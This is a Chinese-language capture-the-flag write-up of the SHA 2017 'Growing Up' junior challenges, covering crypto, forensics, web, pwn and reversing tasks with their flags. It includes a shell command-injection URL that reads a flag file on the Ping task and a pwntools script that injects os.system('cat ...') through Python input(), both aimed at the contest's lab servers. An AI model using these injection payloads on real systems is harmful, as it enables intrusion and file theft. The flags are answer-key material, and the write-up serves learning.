SHACTF-2017-Growing Up-writeup 单刷。

前言

Growing Up这题题目如下

1	You remember the day you started hacking or playing CTF's? You can relive these days by playing our junior version. Just solve all challenges to get the flag ;-)

所以只有当把 Junior上的题全做完后才能拿到flag。自己一个人单刷了四五个小时，最后于凌晨2：25分拿到了这题的flag。

Crypto

All about the Base (1)

We found this encoded message. Can you decode it?
V2VsbCBkb25lLAoKdGhpcyBmaWxlIGlzIGVuY3J5cHRlZCB3aXRoIEJhc2U2NC4gT2Z0ZW4gdXNl
ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku
IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm
YWQ0NDM5Y2YzMjFmZTV9Cg==

flag:

1
2
3

>>> import base64
>>> base64.b64decode("V2VsbCBkb25lLAoKdGhpcyBmaWxlIGlzIGVuY3J5cHRlZCB3aXRoIEJhc2U2NC4gT2Z0ZW4gdXNl ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm YWQ0NDM5Y2YzMjFmZTV9Cg==")
"Well done,\n\nthis file is encrypted with Base64. Often used in CTF's to display binary data in a more friendly way. \n\nThe flag for this challenge is flag{b3e9c3eee609bac46fad4439cf321fe5}\n"

Rotation (1)

1 2	Seems someone rotated the alphabet, can you get the original message back? Ykksy eua ckxk ghrk zu mkz znk zkdz hgiq. Znk lrgm oy lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}

凯撒

1	Seems you were able to get the text back. The flag is flag{30d3a1aa0cda9f08cdfa52668bc6854a}

Substitute Teacher (2)

Hello, my name is Mr. Smith, I will be your substitute teacher for today. I only have one assignment for you today, if you solve it you may go home. Now be silence and solve it, so I can Netflix and chill!
osvi cpm dprzsob ulsd hddsboeiou. iocpg gpaj njii usei. rihzi uli vrhdd tsulpau ehfsob h dpaow,
s'e so uli eswwri pn h oit iqsdpwi pn pjhobi sd uli oit mrhvf po oiunrsy. npj gpaj innpjud s lhzi
h nrhb npj gpa: nrhb{h230h7i624hnhv36291v5n31nh818w6n}

词频分析一下，丢到这个网站 http://quipqiup.com/ ：

1	flag{a230a7e624afac36291c5f31fa818d6f}

Exclusive or … (2)

1	We found this strange text, can you get the original from it?

题目说得很明显啦，异或加密。我们可以用工具xortool。

得到明文：

Well done. This text is encrypted with XOR with the single character '\x03'. XOR is often used in CTF challenges. We did use it in our teaser challenges 'Crypto Engine' and 'Website Attack'. The flag of this challenge is: flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}

flag为：

1	flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}

Transposition (3)

1
2
3

We intercepted this secret message. We believe it is using a transposition cipher. Can you decipher it?
Citgoe6b0 oohern636 nni.tg1e2 gssThe58e rschii366
aohess3ae tlafcf3dc uvllhl24f lilaaa730 aneglg506 tgnfl{33}

竖下来读。得到明文

1	Congratulationssolvingthischallenge.Theflagforthischalengeisflag{66153332753b3e86ad4303062e6ecf06}

flag：

1	flag{66153332753b3e86ad4303062e6ecf06}

Forensics

Deleted File (3)

1	FLAG{129F0A52F0F41E077E0FD03063FF4FAD}

Misc

Zipfile One (1)

1	We received this zip file, but is asking for a password. All we know is that the password exists of 5 numbers, can you crack this password to get the hidden information?

给了压缩包，又说了是五个数字。爆破得密码为42831。flag：

1	flag{d6f56ae046bb241cc61f9d26f8e525d9}

Zipfile Two (2)

1	We received another zip file, which also requires a password. All we know is that the password is an existing English word with a length of 6 and all lowercase. Can you crack this password?

继续爆破，得密码为：future。得到flag：

1	flag{7128d78caf1e3297386a09afae0f8ea4}

Reverse (3)

1	We found this file on a server on the other side of the world, it looks weird, can you "reverse" it?

一开始做的时候，从后读取放到新文件里，比如\x74 \xe4 \x05 \x98对应成\x98 \x05 \xe4 \x7，结果输出后发现没用。后面突然想到，74e40598，直接尼过来是 89504e47，这个正是png的文件头。

所以我先把原文件的十六进制拿了出来，把里面的空格，换行符去掉，放到reverse_fix中。用下面的脚本得到“逆向”后的十六进制。

reverse  = open("reverse_fix","r")
flag_reverse = open("flag_reverse.txt","wb")
data = reverse.read()
datalen = len(data)
data = data[::-1]
flag_reverse.write()
reverse.close()
flag_reverse.close()

之后再把flag_reverse.txt中的内容复制到十六进制编辑器中，保存为一张图片。

flag：

1	flag{758d7fa2762ab838c4835f1995e151d2}

Network

Download (1)

1	FLAG{259F1B841EAAA4FCB843D77DCDADE55A}

Wanna Buy A Flag? (2)

打开后追踪TCP流，得到flag：

1	flag{f08574923ec9c9ffb47188e6edc1a20f}

Weird Website (3)

导出页面后查看。

1	flag{8233daf526dcee25fd9ffda3bb99d677}

Captured Mail (4)

import base64
capturedmail = open("capturedmail.zip","wb")
data = "UEsDBBQAAAAIAIy53UoyFb1+UwAAAFgAAAAIABwAZmxhZy50eHRVVAkAAzhtVVk4bVVZdXgLAAEE6AMAAAToAwAAFclLCoAgEADQfaeYA0QQMaOz7iSjjB8QBbVVdPdq+Xhnq7HLvIrM3OpYYSaFUCRCaP1DHuCTlKI1Knz4694dsrHGGELrxAuzV8JDAgVBJn225QVQSwECHgMUAAAACACMud1KMhW9flMAAABYAAAACAAYAAAAAAABAAAApIEAAAAAZmxhZy50eHRVVAUAAzhtVVl1eAsAAQToAwAABOgDAABQSwUGAAAAAAEAAQBOAAAAlQAAAAAA"
capturedmail.write(base64.b64decode(data))
capturedmail.close()

得到一个压缩包，解压后得到flag：

1	flag{1b5978777658baca99ce653af6fa596e}

Web

In Your Head (1)

地址：http://inyourhead.stillhackinganyway.nl/

抓包看头部，得到flag：

1	flag{a1a4d64086f713e92a809859d930d120}

Old School (2)

地址：http://oldschool.stillhackinganyway.nl/
抓包修改User-Agent头：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

1	flag{f374df6554c7c6a6fced10396c84baf6}

Broken Image (2)

查看源代码，把base64串进行解密。得到flag：

1	flag{c0711614358a27110ca159302b106759}

Location (3)

点进去后，每次访问一个新的页面，就记下页面的三个字母。等跳转完把字母拼接起来就行了。

1	flag{f51cf5e7e1d003986acd2864139553a1}

Ping (4)

1	http://ping.stillhackinganyway.nl/?ip=127.0.0.1\|ls

知道有 s3cr3tfl4g.txt

1	http://ping.stillhackinganyway.nl/?ip=127.0.0.1\|cat s3cr3tfl4g.txt

得到flag：

1	flag{a8bb1ea55704762941ef519f98fff075}

Pwnable

small (4)

服务器端是python服务。

1 2	#!/usr/bin/env python print "HACK "*input("Number: ")

以下是exp：

from pwn import *
r = remote("small.stillhackinganyway.nl",1337)
paylaod = "__import__('os').system('cat /home/small/flag')"
r.sendline(paylaod)
# print(r.recv())
r.interactive()

得到flag：

1	flag{69b5a247b9cd52ac97de7cc94994083e}

Re

Find The Flag (1)

用IDA打开看一下就得到了flag：

1	flag{b760866fa6f035548be127b7525dbb66}

Hidden Message (3)

JEB打开，查看strings.xml。

1	flag{d3314ac1a08d65ea32ffd30907de2409}

Flip A Coin (4)

用IDA打开后，通过查看strings可以找到关键处。可以看到当v3==100，时会输出flag。

而v3是在每次赢了之后会加一，其地址为0x00401668

接下来用olldbg来动态调试。

给0x00401668处下个断点。

第一次输1，如果赢了的话，会看到对应的位置由0变成了1

利用olldbg的修改数据功能，我们把1修改为100，这里是十六进制，所以填入64

之后点击运行。程序判断v3==100后进行输出flag操作。

flag:

1	flag{d754c599d47d9b3e4a376e1d770ca8c1}

Jump Around (4)

写个程序跑一下。

#include <iostream>
#include <cstdio>
#include <windows.h>
using namespace std;
int main()
{
    int v1[48];
    __int64 v8 = 7523094288207667809LL;
    __int64 v9 = 8101815670912281193LL;
    __int64 v10 = 8680537053616894577LL;
    __int64 v11 = 3833745473465776761LL;
    __int64 v12 = 959985462;
    __int64 v13 = 24929;
    __int64 v2 = 6508264540403273223LL;
    __int64 v3 = 5213490578399759196LL;
    __int64 v4 = 5409190721146722066LL;
    __int64 v5 = 73472674227045146LL;
    __int64 v6 = 202114575;
    __int64 v7 = 7173;
    int i;
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v2 + i) ^ *((char *)&v8 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v3 + i) ^ *((char *)&v9 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v4 + i) ^ *((char *)&v10 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 7; ++i ){
        v1[i] = *((char *)&v5 + i) ^ *((char *)&v11 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 3; ++i ){
        v1[i] = *((char *)&v6 + i) ^ *((char *)&v12 + i);
        printf("%c",v1[i]);
    }
    for ( i = 0; i <= 1; ++i ){
        v1[i] = *((char *)&v7 + i) ^ *((char *)&v13 + i);
        printf("%c",v1[i]);
    }
   return 0;
}

得到flag：

1	flag{f525a6abd58ce9488f3c90904149145d}